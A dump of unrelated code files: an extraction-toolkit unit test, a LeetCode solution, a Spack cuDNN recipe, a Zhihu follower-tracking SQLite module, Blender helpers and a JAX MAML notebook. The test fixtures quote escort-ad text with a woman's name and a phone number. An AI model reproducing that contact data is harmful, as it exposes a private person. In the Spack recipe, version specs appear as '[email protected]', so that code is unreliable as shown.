"text": "27 \n my name is <etk 'attribute' = 'name'>helena</etk> height 160cms weight 55 kilos "
},
"document_id": "1A4A5FF5BD066309C72C8EEE6F7BCCCFD21B83245AFCDADDF014455BCF990A21"
},
"confidence": {
"extraction": 1.0
},
"method": "extract_using_dictionary",
"extracted_value": "helena"
},
{
"source": {
"segment": "content_strict",
"context": {
"start": 41,
"end": 58,
"input": "text",
"text": "91 27 \n <etk 'attribute' = 'name'>My name is Helena</etk> height 16"
},
"document_id": "1A4A5FF5BD066309C72C8EEE6F7BCCCFD21B83245AFCDADDF014455BCF990A21"
},
"confidence": {
"extraction": 1.0
},
"method": "extract_using_regex",
"extracted_value": "Helena"
}
],
"key": "helena",
"value": "helena"
},
{
"confidence": 1,
"provenance": [
{
"source": {
"segment": "content_relaxed",
"context": {
"start": 136,
"end": 137,
"input": "tokens",
"text": "\n hey i ' m <etk 'attribute' = 'name'>luna</etk> 3234522013 let ' s explore "
},
"document_id": "1A4A5FF5BD066309C72C8EEE6F7BCCCFD21B83245AFCDADDF014455BCF990A21"
},
"confidence": {
"extraction": 1.0
},
"method": "extract_using_dictionary",
"extracted_value": "luna"
},
{
"source": {
"segment": "content_strict",
"context": {
"start": 136,
"end": 137,
"input": "tokens",
"text": "\n hey i ' m <etk 'attribute' = 'name'>luna</etk> 3234522013 let ' s explore "
},
"document_id": "1A4A5FF5BD066309C72C8EEE6F7BCCCFD21B83245AFCDADDF014455BCF990A21"
},
"confidence": {
"extraction": 1.0
},
"method": "extract_using_dictionary",
"extracted_value": "luna"
},
{
"source": {
"segment": "title",
"context": {
"start": 9,
"end": 10,
"input": "tokens",
"text": "2013 escort alert ! - <etk 'attribute' = 'name'>luna</etk> the hot playmate ( 323 "
},
"document_id": "1A4A5FF5BD066309C72C8EEE6F7BCCCFD21B83245AFCDADDF014455BCF990A21"
},
"confidence": {
"extraction": 1.0
},
"method": "extract_using_dictionary",
"extracted_value": "luna"
}
],
"key": "luna",
"value": "luna"
}
]
results = r["knowledge_graph"]["name"]
self.assertTrue(expected, results)
def test_extraction_multiple_input_paths(self):
women_name_file_path = os.path.join(os.path.dirname(__file__), "resources/female-names.json.gz")
e_config = {"document_id": "doc_id",
"resources": {
"dictionaries": {
"women_name": women_name_file_path
}
},
"data_extraction": [
{
"input_path": ["*.*.text.`parent`", "*.inferlink_extractions.*.text.`parent`"],
"fields": {
"name": {
"extractors": {
"extract_using_dictionary": {
"config": {
"dictionary": "women_name",
"ngrams": 1,
"joiner": " ",
"pre_process": [
"x.lower()"
],
"pre_filter": [
"x"
],
"post_filter": [
"isinstance(x, basestring)"
]
},
"extraction_policy": "keep_existing"
},
"extract_using_regex": {
"config": {
"include_context": "true",
"regex": "(?:my[\\s]+name[\\s]+is[\\s]+([-a-z0-9@$!]+))",
"regex_options": [
"IGNORECASE"
],
"pre_filter": [
"x.replace('\\n', '')",
"x.replace('\\r', '')"
]
},
"extraction_policy": "replace"
}
}
}
}
}
]
}
c = Core(extraction_config=e_config)
r = c.process(self.doc)
self.assertTrue("content_extraction" in r)
self.assertTrue("content_strict" in r["content_extraction"])
self.assertTrue("text" in r["content_extraction"]["content_strict"])
self.assertTrue("simple_tokens_original_case" in r["content_extraction"]["content_strict"])
self.assertTrue("simple_tokens" in r["content_extraction"]["content_strict"])
self.assertTrue("content_relaxed" in r["content_extraction"])
self.assertTrue("text" in r["content_extraction"]["content_relaxed"])
self.assertTrue("simple_tokens_original_case" in r["content_extraction"]["content_relaxed"])
self.assertTrue("simple_tokens" in r["content_extraction"]["content_relaxed"])
self.assertTrue("title" in r["content_extraction"])
self.assertTrue("text" in r["content_extraction"]["title"])
self.assertTrue("simple_tokens_original_case" in r["content_extraction"]["title"])
self.assertTrue("simple_tokens" in r["content_extraction"]["title"])
self.assertTrue("inferlink_extractions" in r["content_extraction"])
ie_ex = r["content_extraction"]["inferlink_extractions"]
self.assertTrue("inferlink_location" in ie_ex)
self.assertTrue("simple_tokens_original_case" in ie_ex["inferlink_location"])
self.assertTrue("simple_tokens" in ie_ex["inferlink_location"])
self.assertTrue("inferlink_age" in ie_ex)
self.assertTrue("simple_tokens_original_case" in ie_ex["inferlink_age"])
self.assertTrue("simple_tokens" in ie_ex["inferlink_age"])
self.assertTrue("inferlink_phone" in ie_ex)
self.assertTrue("simple_tokens_original_case" in ie_ex["inferlink_phone"])
self.assertTrue("simple_tokens" in ie_ex["inferlink_phone"])
self.assertTrue("inferlink_posting-date" in ie_ex)
self.assertTrue("simple_tokens_original_case" in ie_ex["inferlink_posting-date"])
self.assertTrue("simple_tokens" in ie_ex["inferlink_posting-date"])
self.assertTrue("inferlink_description" in ie_ex)
self.assertTrue("simple_tokens_original_case" in ie_ex["inferlink_description"])
self.assertTrue("simple_tokens" in ie_ex["inferlink_description"])
results = r["knowledge_graph"]["name"]
expected = [
{
"confidence": 1,
"provenance": [
{
"source": {
"segment": "content_relaxed",
"context": {
"start": 10,
"end": 11,
"input": "tokens",
"text": "27 \n my name is <etk 'attribute' = 'name'>helena</etk> height 160cms weight 55 kilos "
},
"document_id": "1A4A5FF5BD066309C72C8EEE6F7BCCCFD21B83245AFCDADDF014455BCF990A21"
},
"confidence": {
"extraction": 1.0
},
"method": "extract_using_dictionary",
"extracted_value": "helena"
},
{
"source": {
"segment": "content_relaxed",
"context": {
"start": 41,
"end": 58,
"input": "text",
"text": "91 27 \n <etk 'attribute' = 'name'>My name is Helena</etk> height 16"
},
"document_id": "1A4A5FF5BD066309C72C8EEE6F7BCCCFD21B83245AFCDADDF014455BCF990A21"
},
"confidence": {
"extraction": 1.0
},
"method": "extract_using_regex",
"extracted_value": "Helena"
},
{
"source": {
"segment": "content_strict",
"context": {
"start": 10,
"end": 11,
"input": "tokens",
"text": "27 \n my name is <etk 'attribute' = 'name'>helena</etk> height 160cms weight 55 kilos "
},
"document_id": "1A4A5FF5BD066309C72C8EEE6F7BCCCFD21B83245AFCDADDF014455BCF990A21"
},
"confidence": {
"extraction": 1.0
},
"method": "extract_using_dictionary",
"extracted_value": "helena"
},
{
"source": {
"segment": "content_strict",
"context": {
"start": 41,
"end": 58,
"input": "text",
"text": "91 27 \n <etk 'attribute' = 'name'>My name is Helena</etk> height 16"
},
"document_id": "1A4A5FF5BD066309C72C8EEE6F7BCCCFD21B83245AFCDADDF014455BCF990A21"
},
"confidence": {
"extraction": 1.0
},
"method": "extract_using_regex",
"extracted_value": "Helena"
}
],
"key": "helena",
"value": "helena"
},
{
"confidence": 1,
"provenance": [
{
"source": {
"segment": "content_relaxed",
"context": {
"start": 136,
"end": 137,
"input": "tokens",
"text": "\n hey i ' m <etk 'attribute' = 'name'>luna</etk> 3234522013 let ' s explore "
},
"document_id": "1A4A5FF5BD066309C72C8EEE6F7BCCCFD21B83245AFCDADDF014455BCF990A21"
},
"confidence": {
"extraction": 1.0
},
"method": "extract_using_dictionary",
"extracted_value": "luna"
},
{
"source": {
"segment": "content_strict",
"context": {
"start": 136,
"end": 137,
"input": "tokens",
"text": "\n hey i ' m <etk 'attribute' = 'name'>luna</etk> 3234522013 let ' s explore "
},
"document_id": "1A4A5FF5BD066309C72C8EEE6F7BCCCFD21B83245AFCDADDF014455BCF990A21"
},
"confidence": {
"extraction": 1.0
},
"method": "extract_using_dictionary",
"extracted_value": "luna"
},
{
"source": {
"segment": "title",
"context": {
"start": 9,
"end": 10,
"input": "tokens",
"text": "2013 escort alert ! - <etk 'attribute' = 'name'>luna</etk> the hot playmate ( 323 "
},
"document_id": "1A4A5FF5BD066309C72C8EEE6F7BCCCFD21B83245AFCDADDF014455BCF990A21"
},
"confidence": {
"extraction": 1.0
},
"method": "extract_using_dictionary",
"extracted_value": "luna"
},
{
"source": {
"segment": "inferlink_description",
"context": {
"start": 4,
"end": 5,
"input": "tokens",
"text": "hey i ' m <etk 'attribute' = 'name'>luna</etk> 3234522013 let ' s explore "
},
"document_id": "1A4A5FF5BD066309C72C8EEE6F7BCCCFD21B83245AFCDADDF014455BCF990A21"
},
"confidence": {
"extraction": 1.0
},
"method": "extract_using_dictionary",
"extracted_value": "luna"
}
],
"key": "luna",
"value": "luna"
}
]
self.assertTrue(expected, results)
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
161386 | <filename>Leetcode/0429. N-ary Tree Level Order Traversal.py
from collections import deque
class Node:
def __init__(self, val=None, children=None):
self.val = val
self.children = children
class Solution:
def levelOrder(self, root: Node) -> list[list[int]]:
if not root:
return root
result = []
queue = deque([root])
while queue:
tempList = []
for _ in range(len(queue)):
node = queue.popleft()
tempList.append(node.val)
if node.children:
queue.extend(node.children)
result.append(tempList)
return result
| StarcoderdataPython |
12547 | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import os
from spack import *
class Cudnn(Package):
"""NVIDIA cuDNN is a GPU-accelerated library of primitives for deep
neural networks"""
homepage = "https://developer.nvidia.com/cudnn"
# Latest versions available at:
# https://developer.nvidia.com/rdp/cudnn-download
# Archived versions available at:
# https://developer.nvidia.com/rdp/cudnn-archive
# Note that download links don't work from command line,
# need to use modified URLs like in url_for_version.
maintainers = ['adamjstewart']
# cuDNN 8.0.2
version('8.0.2.39-11.0-linux-x64',
sha256='672f46288b8edd98f8d156a4f1ff518201ca6de0cff67915ceaa37f6d6d86345')
version('8.0.2.39-11.0-linux-ppc64le',
sha256='b7c1ce5b1191eb007ba3455ea5f497fdce293a646545d8a6ed93e9bb06d7f057')
version('8.0.2.39-10.2-linux-x64',
sha256='c9cbe5c211360f3cfbc0fb104f0e9096b37e53f89392525679f049276b2f701f')
version('8.0.2.39-10.2-linux-ppc64le',
sha256='c32325ff84a8123491f2e58b3694885a9a672005bc21764b38874688c0e43262')
version('8.0.2.39-10.1-linux-x64',
sha256='82148a68bd6bdaab93af5e05bb1842b8ccb3ab7de7bed41f609a7616c102213d')
version('8.0.2.39-10.1-linux-ppc64le',
sha256='8196ec4f031356317baeccefbc4f61c8fccb2cf0bdef0a6431438918ddf68fb9')
# cuDNN 8.0
version('8.0.0.180-11.0-linux-x64',
sha256='9e75ea70280a77de815e0bdc85d08b67e081bc99a708b574092142344d2ba07e')
version('8.0.0.180-11.0-linux-ppc64le',
sha256='1229e94731bbca63ee7f5a239f4e1838a51a301d896f3097fbf7377d74704060')
version('8.0.0.180-10.2-linux-x64',
sha256='0c87c12358ee2b99d57c2a8c7560e3bb93e54bb929f5f8bec4964a72a2bb261d')
version('8.0.0.180-10.2-linux-ppc64le',
sha256='59e4ad6db15fcc374976e8052fe39e3f30f34079710fb3c7751a64c853d9243f')
# cuDNN 7.6.5
version('7.6.5.32-10.2-linux-x64',
sha256='600267f2caaed2fd58eb214ba669d8ea35f396a7d19b94822e6b36f9f7088c20',
preferred=True)
version('7.6.5.32-10.2-linux-ppc64le',
sha256='7dc08b6ab9331bfd12207d4802c61db1ad7cace7395b67a6e7b16efa0335668b')
version('7.6.5.32-10.1-linux-x64',
sha256='7eaec8039a2c30ab0bc758d303588767693def6bf49b22485a2c00bf2e136cb3')
version('7.6.5.32-10.1-osx-x64',
sha256='8ecce28a5ed388a2b9b2d239e08d7c550f53b79288e6d9e5eb4c152bfc711aff')
version('7.6.5.32-10.1-linux-ppc64le',
sha256='97b2faf73eedfc128f2f5762784d21467a95b2d5ba719825419c058f427cbf56')
version('7.6.5.32-10.0-linux-x64',
sha256='28355e395f0b2b93ac2c83b61360b35ba6cd0377e44e78be197b6b61b4b492ba')
version('7.6.5.32-10.0-osx-x64',
sha256='6fa0b819374da49102e285ecf7fcb8879df4d0b3cc430cc8b781cdeb41009b47')
version('7.6.5.32-10.0-linux-ppc64le',
sha256='b1717f4570083bbfc6b8b59f280bae4e4197cc1cb50e9d873c05adf670084c5b')
version('7.6.5.32-9.2-linux-x64',
sha256='a2a2c7a8ba7b16d323b651766ee37dcfdbc2b50d920f73f8fde85005424960e4')
version('7.6.5.32-9.2-linux-ppc64le',
sha256='a11f44f9a827b7e69f527a9d260f1637694ff7c1674a3e46bd9ec054a08f9a76')
version('7.6.5.32-9.0-linux-x64',
sha256='bd0a4c0090d5b02feec3f195738968690cc2470b9bc6026e6fe8ff245cd261c8')
# cuDNN 7.6.4
version('7.6.4.38-10.1-linux-x64',
sha256='32091d115c0373027418620a09ebec3658a6bc467d011de7cdd0eb07d644b099')
version('7.6.4.38-10.1-osx-x64',
sha256='bfced062c3689ced2c1fb49c7d5052e6bc3da6974c1eb707e4dcf8cd209d4236')
version('7.6.4.38-10.1-linux-ppc64le',
sha256='f3615fea50986a4dfd05d7a0cf83396dfdceefa9c209e8bf9691e20a48e420ce')
version('7.6.4.38-10.0-linux-x64',
sha256='417bb5daf51377037eb2f5c87649000ca1b9cec0acb16cfe07cb1d3e9a961dbf')
version('7.6.4.38-10.0-osx-x64',
sha256='af01ab841caec25087776a6b8fc7782883da12e590e24825ad1031f9ae0ed4b1')
version('7.6.4.38-10.0-linux-ppc64le',
sha256='c1725ad6bd7d7741e080a1e6da4b62eac027a94ac55c606cce261e3f829400bb')
version('7.6.4.38-9.2-linux-x64',
sha256='c79156531e641289b6a6952888b9637059ef30defd43c3cf82acf38d67f60a27')
version('7.6.4.38-9.2-linux-ppc64le',
sha256='98d8aae2dcd851558397a9a30b73242f257e1556be17c83650e63a0685969884')
version('7.6.4.38-9.0-linux-x64',
sha256='8db78c3623c192d4f03f3087b41c32cb0baac95e13408b5d9dabe626cb4aab5d')
# cuDNN 7.6.3
version('7.6.3.30-10.1-linux-x64',
sha256='352557346d8111e2f954c494be1a90207103d316b8777c33e62b3a7f7b708961')
version('7.6.3.30-10.1-linux-ppc64le',
sha256='f274735a8fc31923d3623b1c3d2b1d0d35bb176687077c6a4d4353c6b900d8ee')
# cuDNN 7.5.1
version('7.5.1.10-10.1-linux-x64',
sha256='2c833f43c9147d9a25a20947a4c5a5f5c33b2443240fd767f63b330c482e68e0')
version('7.5.1.10-10.1-linux-ppc64le',
sha256='a9e23bc83c970daec20874ccd1d8d80b648adf15440ecd0164818b330b1e2663')
version('7.5.1.10-10.0-linux-x64',
sha256='c0a4ec438920aa581dd567117b9c316745b4a451ac739b1e04939a3d8b229985')
version('7.5.1.10-10.0-linux-ppc64le',
sha256='d9205718da5fbab85433476f9ff61fcf4b889d216d6eea26753bbc24d115dd70')
# cuDNN 7.5.0
version('7.5.0.56-10.1-linux-x64',
sha256='c31697d6b71afe62838ad2e57da3c3c9419c4e9f5635d14b683ebe63f904fbc8')
version('7.5.0.56-10.1-linux-ppc64le',
sha256='15415eb714ab86ab6c7531f2cac6474b5dafd989479b062776c670b190e43638')
version('7.5.0.56-10.0-linux-x64',
sha256='701097882cb745d4683bb7ff6c33b8a35c7c81be31bac78f05bad130e7e0b781')
version('7.5.0.56-10.0-linux-ppc64le',
sha256='f0c1cbd9de553c8e2a3893915bd5fff57b30e368ef4c964d783b6a877869e93a')
# cuDNN 7.3.0
version('7.3.0.29-9.0-linux-x64',
sha256='403f9043ff2c7b2c5967454872275d07bca11fd41dfc7b21995eadcad6dbe49b')
# cuDNN 7.2.1
version('7.2.1.38-9.0-linux-x64',
sha256='cf007437b9ac6250ec63b89c25f248d2597fdd01369c80146567f78e75ce4e37')
# cuDNN 7.1.3
version('7.1.3-9.1-linux-x64',
sha256='dd616d3794167ceb923d706bf73e8d6acdda770751492b921ee6827cdf190228')
version('7.1.3-9.1-linux-ppc64le',
sha256='e3b4837f711b98a52faacc872a68b332c833917ef3cf87c0108f1d01af9b2931')
# cuDNN 6.0
version('6.0-8.0-linux-x64',
sha256='9b09110af48c9a4d7b6344eb4b3e344daa84987ed6177d5c44319732f3bb7f9c')
# cuDNN 5.1
version('5.1-8.0-linux-x64',
sha256='c10719b36f2dd6e9ddc63e3189affaa1a94d7d027e63b71c3f64d449ab0645ce')
# CUDA 10.2
depends_on('[email protected]:11.0.2', when='@7.6.5.32-10.2-linux-x64')
# CUDA 10.1
depends_on('[email protected]:11.0.2', when='@7.6.5.32-10.1-osx-x64')
depends_on('[email protected]:11.0.2', when='@7.6.5.32-10.1-linux-x64')
depends_on('[email protected]:11.0.2', when='@7.6.5.32-10.1-linux-ppc64le')
depends_on('[email protected]:11.0.2', when='@7.6.4.38-10.1-osx-x64')
depends_on('[email protected]:11.0.2', when='@7.6.4.38-10.1-linux-x64')
depends_on('[email protected]:11.0.2', when='@7.6.4.38-10.1-linux-ppc64le')
depends_on('[email protected]:11.0.2', when='@7.6.3.30-10.1-linux-x64')
depends_on('[email protected]:11.0.2', when='@7.6.3.30-10.1-linux-ppc64le')
depends_on('[email protected]:10.1.999', when='@7.5.0.56-10.1-linux-x64')
depends_on('[email protected]:10.1.999', when='@7.5.0.56-10.1-linux-ppc64le')
# CUDA 10.0
depends_on('[email protected]:11.0.2', when='@7.6.5.32-10.0-osx-x64')
depends_on('[email protected]:11.0.2', when='@7.6.5.32-10.0-linux-x64')
depends_on('[email protected]:11.0.2', when='@7.6.5.32-10.0-linux-ppc64le')
depends_on('[email protected]:11.0.2', when='@7.6.4.38-10.0-osx-x64')
depends_on('[email protected]:11.0.2', when='@7.6.4.38-10.0-linux-x64')
depends_on('[email protected]:11.0.2', when='@7.6.4.38-10.0-linux-ppc64le')
depends_on('[email protected]:11.0.2', when='@7.5.1.10-10.0-linux-x64')
depends_on('[email protected]:11.0.2', when='@7.5.1.10-10.0-linux-ppc64le')
depends_on('[email protected]:11.0.2', when='@7.5.0.56-10.0-linux-x64')
depends_on('[email protected]:11.0.2', when='@7.5.0.56-10.0-linux-ppc64le')
# CUDA 9.2
depends_on('[email protected]:9.2.999', when='@7.6.5.32-9.2-linux-x64')
depends_on('[email protected]:9.2.999', when='@7.6.5.32-9.2-linux-ppc64le')
depends_on('[email protected]:9.2.999', when='@7.6.4.38-9.2-linux-x64')
depends_on('[email protected]:9.2.999', when='@7.6.4.38-9.2-linux-ppc64le')
# CUDA 9.1
depends_on('[email protected]:9.1.999', when='@7.1.3-9.1-linux-x64')
depends_on('[email protected]:9.1.999', when='@7.1.3-9.1-linux-ppc64le')
# CUDA 9.0
depends_on('[email protected]:9.0.999', when='@7.6.5.32-9.0-linux-x64')
depends_on('[email protected]:9.0.999', when='@7.6.4.38-9.0-linux-x64')
depends_on('[email protected]:9.0.999', when='@7.3.0.29-9.0-linux-x64')
depends_on('[email protected]:9.0.999', when='@7.2.1.38-9.0-linux-x64')
# CUDA 8.0
depends_on('[email protected]:8.0.999', when='@6.0-8.0-linux-x64')
depends_on('[email protected]:8.0.999', when='@5.1-8.0-linux-x64')
def url_for_version(self, version):
url = 'https://developer.download.nvidia.com/compute/redist/cudnn/v{0}/cudnn-{1}-v{2}.tgz'
if version >= Version('7.2'):
directory = version[:3]
ver = version[:4]
cuda = version[4:]
elif version >= Version('7.1'):
directory = version[:3]
ver = version[:2]
cuda = version[3:]
elif version >= Version('7.0'):
directory = version[:3]
ver = version[0]
cuda = version[3:]
else:
directory = version[:2]
ver = version[:2]
cuda = version[2:]
return url.format(directory, cuda, ver)
def setup_run_environment(self, env):
if 'target=ppc64le: platform=linux' in self.spec:
env.set('cuDNN_ROOT', os.path.join(
self.prefix, 'targets', 'ppc64le-linux'))
def install(self, spec, prefix):
install_tree('.', prefix)
if 'target=ppc64le: platform=linux' in spec:
symlink(os.path.join(prefix, 'targets', 'ppc64le-linux', 'lib'),
prefix.lib)
symlink(
os.path.join(prefix, 'targets', 'ppc64le-linux', 'include'),
prefix.include)
| StarcoderdataPython |
3246341 | <reponame>Yappawu/qqqfome
import os
import sqlite3
import json
import logging
import datetime
from zhihu import Author, ZhihuClient
from . import common as c
from . import strings as s
L = logging.getLogger('qqqufome-db')
def set_logger_level(level):
c.check_type(level, 'level', logging.NOTSET)
global L
L.setLevel(level)
def set_logger_handle(handle):
L.addHandler(handle)
def author_to_db_filename(author):
c.check_type(author, 'author', Author)
return author.id + '.sqlite3'
def create_db(author):
c.check_type(author, 'author', Author)
filename = author_to_db_filename(author)
L.info(s.log_get_user_id.format(filename))
if os.path.isfile(filename):
e = FileExistsError()
e.filename = filename
raise e
L.info(s.log_db_not_exist_create.format(filename))
db = sqlite3.connect(author_to_db_filename(author))
L.info(s.log_connected_to_db.format(filename))
return db
def connect_db(database):
c.check_type(database, 'database', str)
if not os.path.isfile(database):
e = FileNotFoundError()
e.filename = database
raise e
return sqlite3.connect(database)
def create_table(db: sqlite3.Connection):
c.check_type(db, 'db', sqlite3.Connection)
L.info(s.log_create_table_in_db)
with db:
db.execute(
'''
CREATE TABLE followers
(
id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,
name TEXT NOT NULL,
in_name TEXT NOT NULL
);
'''
)
db.execute(
"""
CREATE TABLE meta
(
id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,
name TEXT NOT NULL,
in_name TEXT NOT NULL,
cookies TEXT NOT NULL
);
"""
)
db.execute(
"""
CREATE TABLE log
(
id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,
time DATETIME NOT NULL,
follower_number INT NOT NULL,
increase INT NOT NULL,
message TEXT NOT NULL
);
"""
)
L.info(s.success)
def add_user_to_db(db, author):
c.check_type(db, 'db', sqlite3.Connection)
c.check_type(author, 'author', Author)
with db:
L.debug(s.log_add_user_to_db.format(author.name))
db.execute(
"""
INSERT INTO followers
(name, in_name) VALUES
( ?, ? );
""",
(author.name, author.id)
)
def dump_init_data_to_db(db, author):
c.check_type(db, 'db', sqlite3.Connection)
c.check_type(author, 'author', Author)
# meta data
with db:
name = author.name
in_name = author.id
cookies = json.dumps(author._session.cookies.get_dict())
db.execute(
"""
INSERT INTO meta
(name, in_name, cookies) VALUES
( ?, ?, ? );
""",
(name, in_name, cookies)
)
# followers
L.info(s.log_start_get_followers.format(author.name))
with db:
for _, follower in zip(range(100), author.followers):
add_user_to_db(db, follower)
# log
with db:
log_to_db(db, author.follower_num, s.log_db_init)
def is_db_closed(db):
c.check_type(db, 'db', sqlite3.Connection)
try:
with db:
db.execute(
"""
SELECT name from sqlite_master where type = 'table';
"""
)
return False
except sqlite3.ProgrammingError:
return True
def close_db(db):
c.check_type(db, 'db', sqlite3.Connection)
if not is_db_closed(db):
db.close()
L.info(s.log_close_db)
def get_cookies(db):
c.check_type(db, 'db', sqlite3.Connection)
cursor = db.execute('SELECT cookies from meta')
row = cursor.fetchone()
if row is None:
return None
return row[0]
def log_to_db(db, follower_num, message):
c.check_type(db, 'db', sqlite3.Connection)
c.check_type(follower_num, 'follower_num', int)
c.check_type(message, 'message', str)
cursor = db.execute(
"""
SELECT follower_number FROM log ORDER BY id DESC;
"""
)
row = cursor.fetchone()
if row:
increase = follower_num - row[0]
else:
# first log
increase = 0
with db:
db.execute(
"""
INSERT INTO log
(time, follower_number, increase, message) VALUES
( ?, ?, ?, ? );
""",
(datetime.datetime.now(), follower_num, increase, message)
)
def is_in_db(db, in_name):
c.check_type(db, 'db', sqlite3.Connection)
c.check_type(in_name, 'in_name', str)
with db:
cursor = db.execute(
"""
SELECT * FROM followers WHERE in_name = ?;
""",
(in_name,)
)
row = cursor.fetchone()
return row is not None
| StarcoderdataPython |
3282169 | import bpy
def apply_render_settings(render_engine,resolution_x,resolution_y,resolution_percentage,pixel_aspect_x,pixel_aspect_y):
bpy.context.scene.render.engine = render_engine
bpy.context.scene.render.resolution_x = resolution_x
bpy.context.scene.render.resolution_y = resolution_y
bpy.context.scene.render.resolution_percentage = resolution_percentage
bpy.context.scene.render.pixel_aspect_x = pixel_aspect_x
bpy.context.scene.render.pixel_aspect_y = pixel_aspect_y
def copy_render_settings(strip):
scene = bpy.context.scene
strip.render_engine = scene.render.engine
strip.resolution_x = scene.render.resolution_x
strip.resolution_y = scene.render.resolution_y
strip.resolution_percentage = scene.render.resolution_percentage
strip.pixel_aspect_x = scene.render.pixel_aspect_x
strip.pixel_aspect_y = scene.render.pixel_aspect_y
def get_available_render_engines():
internal_engines = [("BLENDER_EEVEE","Eevee","Eevee"), ("BLENDER_WORKBENCH","Workbench","Workbench")]
external_engines = set((e.bl_idname,e.bl_label,e.bl_label) for e in bpy.types.RenderEngine.__subclasses__())
return internal_engines + list(external_engines)
def get_available_render_engines_values():
return [e[0] for e in get_available_render_engines()]
def ShowMessageBox(message = "", title = "Message Box", icon = 'INFO'):
def draw(self, context):
self.layout.label(text=message)
bpy.context.window_manager.popup_menu(draw, title = title, icon = icon)
| StarcoderdataPython |
1734060 | #%%
from functools import partial
import jax
import jax.numpy as np
from jax import random, vmap, jit, grad
from jax.experimental import stax, optimizers
from jax.experimental.stax import Dense, Relu
import matplotlib.pyplot as plt
from tqdm.notebook import tqdm
#%%
# Use stax to set up network initialization and evaluation functions
net_init, net_apply = stax.serial(
Dense(40), Relu,
Dense(40), Relu,
Dense(1)
)
in_shape = (-1, 1,)
rng = random.PRNGKey(0)
out_shape, params = net_init(rng, in_shape)
#%%
import numpy as onp
def get_wave(wave_gen, n_samples=100, wave_params=False):
x = wave_gen(n_samples)
amp = onp.random.uniform(low=0.1, high=5.0)
phase = onp.random.uniform(low=0., high=onp.pi)
wave_data = x, onp.sin(x + phase) * amp
if wave_params: wave_data = (wave_data, (phase, amp))
return wave_data
def vis_wave_gen(N): # better for visualization
x = onp.linspace(-5, 5, N).reshape((N, 1))
return x
def train_wave_gen(N): # for model training
x = onp.random.uniform(low=-5., high=5., size=(N, 1))
return x
def mse(params, batch):
x, y = batch
ypred = net_apply(params, x)
return np.mean((y - ypred)**2)
#%%
batch = get_wave(vis_wave_gen, 100)
predictions = net_apply(params, batch[0])
losses = mse(params, batch)
plt.plot(batch[0], predictions, label='prediction')
plt.plot(*batch, label='target')
plt.legend()
#%%
opt_init, opt_update, get_params = optimizers.adam(step_size=1e-2)
@jit
def step(i, opt_state, batch):
params = get_params(opt_state)
g = grad(mse)(params, batch)
return opt_update(i, g, opt_state)
#%%
out_shape, params = net_init(rng, in_shape) # re-init model
opt_state = opt_init(params) # init optim
batch = get_wave(vis_wave_gen, 100)
for i in range(200):
opt_state = step(i, opt_state, batch)
params = get_params(opt_state)
xb, yb = batch
plt.plot(xb, net_apply(params, xb), label='prediction')
plt.plot(xb, yb, label='target')
plt.legend()
# %%
### MAML
alpha = 0.1
# inner loop -- take one gradient step on the data
def inner_update(params, batch):
grads = grad(mse)(params, batch)
sgd_update = lambda param, grad: param - alpha * grad
inner_params = jax.tree_multimap(sgd_update, params, grads)
return inner_params
# outer loop
def maml_loss(params, train_batch, test_batch):
task_params = inner_update(params, train_batch)
loss = mse(task_params, test_batch)
return loss
@jit
def maml_step(i, opt_state, train_batch, test_batch):
params = get_params(opt_state)
g = grad(maml_loss)(params, train_batch, test_batch)
return opt_update(i, g, opt_state)
## task extractor
def get_task(n_train, n_test, wave_params=False):
if not wave_params:
batch = get_wave(train_wave_gen, n_train + n_test)
else:
batch, wparams = get_wave(train_wave_gen, n_train + n_test, wave_params=True)
# extract train/test elements from batch=(xb, yb) with treemap :)
train_batch = jax.tree_map(lambda l: l[:n_train], batch, is_leaf=lambda node: hasattr(node, 'shape'))
test_batch = jax.tree_map(lambda l: l[n_train:], batch, is_leaf=lambda node: hasattr(node, 'shape'))
task = train_batch, test_batch
if wave_params: task = (*task, wparams)
return task
# %%
opt_init, opt_update, get_params = optimizers.adam(step_size=1e-3)
out_shape, params = net_init(rng, in_shape) # re-init model
opt_state = opt_init(params) # init optim
for i in tqdm(range(20000)):
train_batch, test_batch = get_task(20, 1)
opt_state = maml_step(i, opt_state, train_batch, test_batch)
params = get_params(opt_state)
# %%
train_batch, test_batch, wparams = get_task(20, 1, wave_params=True)
# re-create wave smoother for visualization
phase, amp = wparams
x = vis_wave_gen(100)
y = np.sin(x + phase) * amp
plt.plot(x, y, label='targets')
step_params = params.copy()
for i in range(5): # visualize wave at each grad step
ypred = net_apply(step_params, x)
plt.plot(x, ypred, label=f'step{i}')
step_params = inner_update(step_params, train_batch)
plt.legend()
# %%
task_batch_size = 5
tasks = [get_task(20, 1) for _ in range(task_batch_size)]
train_batch, test_batch = jax.tree_multimap(lambda *b: np.stack(b), *tasks, is_leaf=lambda node: hasattr(node, 'shape'))
xb, yb = train_batch
for i in range(len(xb)):
plt.scatter(xb[i], yb[i])
# %%
def batch_maml_loss(params, train_batch, test_batch):
losses = vmap(partial(maml_loss, params))(train_batch, test_batch)
loss = losses.mean()
return loss
@jit
def batch_maml_step(i, opt_state, train_batch, test_batch):
params = get_params(opt_state)
g = grad(batch_maml_loss)(params, train_batch, test_batch)
return opt_update(i, g, opt_state)
# %%
task_batch_size = 4
opt_init, opt_update, get_params = optimizers.adam(step_size=1e-3)
out_shape, params = net_init(rng, in_shape) # re-init model
opt_state = opt_init(params) # init optim
for i in tqdm(range(20000)):
# get batch of tasks
tasks = [get_task(20, 1) for _ in range(task_batch_size)]
train_batch, test_batch = jax.tree_multimap(lambda *b: np.stack(b), *tasks, is_leaf=lambda node: hasattr(node, 'shape'))
# take gradient step over the mean
opt_state = batch_maml_step(i, opt_state, train_batch, test_batch)
params = get_params(opt_state)
# %%
train_batch, test_batch, wparams = get_task(20, 1, wave_params=True)
# re-create wave smoother for visualization
phase, amp = wparams
x = vis_wave_gen(100)
y = np.sin(x + phase) * amp
plt.plot(x, y, label='targets')
plt.scatter(*train_batch, label='train')
step_params = params.copy()
for i in range(5): # visualize wave at each grad step
ypred = net_apply(step_params, x)
plt.plot(x, ypred, label=f'step{i}')
step_params = inner_update(step_params, train_batch)
plt.legend()
# %%
| StarcoderdataPython |
54611 | SEED = 1
TOPIC_POKEMONS = 'pokemons'
TOPIC_USERS = 'users'
GROUP_DASHBOARD = 'dashboard'
GROUP_LOGIN_CHECKER = 'checker'
